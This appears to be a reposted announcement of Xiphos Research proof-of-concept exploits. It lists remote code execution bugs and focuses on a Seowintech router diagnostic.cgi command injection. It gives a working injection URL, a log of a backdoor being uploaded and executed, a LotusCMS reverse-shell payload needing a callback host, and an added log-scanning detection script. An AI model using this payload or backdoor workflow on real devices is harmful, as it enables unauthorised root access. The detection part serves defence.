Changelog and tool added 25/04/2015:
+ Exploit for Seowintech Routers diagnostic.cgi Unauthenticated Remote Root Code Execution.
Miscellaneous proof of concept exploit code written at Xiphos Research for testing purposes.
Updates Exploits 25.04.2015:
+ phpMoAdmin Remote Code Execution (CVE-2015-2208)
+ LotusCMS Remote Code Execution (OSVDB-75095)
+ ElasticSearch Remote Code Execution (CVE-2015-1427)
+ ShellShock (httpd) Remote Code Execution (CVE-2014-6271)
+ IISlap – http.sys Denial of Service/RCE PoC (DoS only). (MS-15-034)
+ se0wned – Seowintech Router diagnostic.cgi remote root
+ TBA
There are no changelogs here, as that would be too much effort, just git commits. Exploits may be updated regularly for greater stability, reliability or stealthiness, so check them for updates regularly.
::Exploit for Seowintech Routers diagnostic.cgi Unauthenticated Remote Root Code Execution::
This is an exploit for an old bug. I found the exploit code lurking around on one of my old hard drives, cleaned it up, and decided to release it. Basically, a long while back, a rather interesting exploit was disclosed which affected ALL Seowontech devices. Technically, it is two exploits: a remote root command injection bug, and a remote root file disclosure bug. Here, I only bother with the command injection bug. These vulnerabilities were found by one Todor Donev.
The bug we are abusing is quite simple. Like many router bugs, it exists in a CGI script that is used for network diagnostics. It is the ping function that is vulnerable: the ping_ipaddr parameter is passed into a shell command without sanitisation, so shell metacharacters in it are interpreted, as the PoC request shows.
PoC:
http://target.com/cgi-bin/diagnostic.cgi?select_mode_ping=on&ping_ipaddr=-q -s 0 127.0.0.1;id;&ping_count=1&action=Apply&html_view=ping
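The injection above is easy to spot in web server access logs, because a legitimate ping_ipaddr value is an IP address or a hostname and nothing else. The following detection script is an added example written for this post, not code from the Xiphos Research repository; it assumes Apache/nginx combined-style log lines and uses constructed sample entries.

```python
"""Flag diagnostic.cgi requests whose ping_ipaddr is not a plain IP or hostname.

Added example, not part of the se0wned exploit. The access log lines in
SAMPLE_LOG are constructed for illustration (RFC 5737 documentation addresses).
"""
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Common/combined log format: client ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A legitimate ping target: valid hostname labels (IP literals are checked separately).
HOSTNAME_RE = re.compile(
    r'^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?'
    r'(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$'
)

# Constructed sample log: a benign ping, the injection from the PoC (URL-encoded
# as a real client would send it), and an unrelated request.
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Apr/2015:10:00:01 +0000] "GET /cgi-bin/diagnostic.cgi?select_mode_ping=on&ping_ipaddr=8.8.8.8&ping_count=1&action=Apply&html_view=ping HTTP/1.1" 200 512',
    '198.51.100.7 - - [25/Apr/2015:10:00:05 +0000] "GET /cgi-bin/diagnostic.cgi?select_mode_ping=on&ping_ipaddr=-q%20-s%200%20127.0.0.1%3Bid%3B&ping_count=1&action=Apply&html_view=ping HTTP/1.1" 200 640',
    '203.0.113.5 - - [25/Apr/2015:10:00:09 +0000] "GET /index.html HTTP/1.1" 200 1024',
]


def is_safe_ping_target(value: str) -> bool:
    """True only for an IPv4/IPv6 literal or a syntactically valid hostname."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        pass
    return bool(HOSTNAME_RE.match(value))


def find_injection_attempts(log_lines):
    """Return (client_ip, decoded ping_ipaddr) for every suspicious diagnostic.cgi hit."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/diagnostic.cgi"):
            continue
        # parse_qs percent-decodes, so "%3B" becomes ";" before we inspect it.
        for value in parse_qs(parts.query, keep_blank_values=True).get("ping_ipaddr", []):
            if not is_safe_ping_target(value):
                hits.append((m.group("ip"), value))
    return hits


if __name__ == "__main__":
    for client, payload in find_injection_attempts(SAMPLE_LOG):
        print(f"suspicious ping_ipaddr from {client}: {payload!r}")
```

Run it against the real access log by replacing SAMPLE_LOG with the file's lines; anything it prints deserves a look at the router's shell history and outbound connections.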
Usage:
To use, simply specify the target router's base URL and a MIPS executable to upload and execute.
Trojans~Princes$ python2 /tmp/se0wn.py
[ASCII-art "SE0WNED" banner]
Exploit for Seowintech Routers, CVE-?. Version: 20150425.1
{+} Uploading our backdoor...
{*} Backdoor is in 237 chunks...
100% |#########################################################################################################################################################################################|
{+} Setting execute bit...
{+} Executing Payload...
Usage Global Script:
To use, simply select which payload you want to use (currently only back_python.php is available, but I plan on adding back_php.php and back_perl.php at a later date). This is the "payload.php". You must also specify a callback host and port, along with the URL of the vulnerable LotusCMS installation.
Download : Master.zip | Clone Url | Our Post Before
Source : https://github.com/XiphosResearch | http://www.xiphosresearch.com/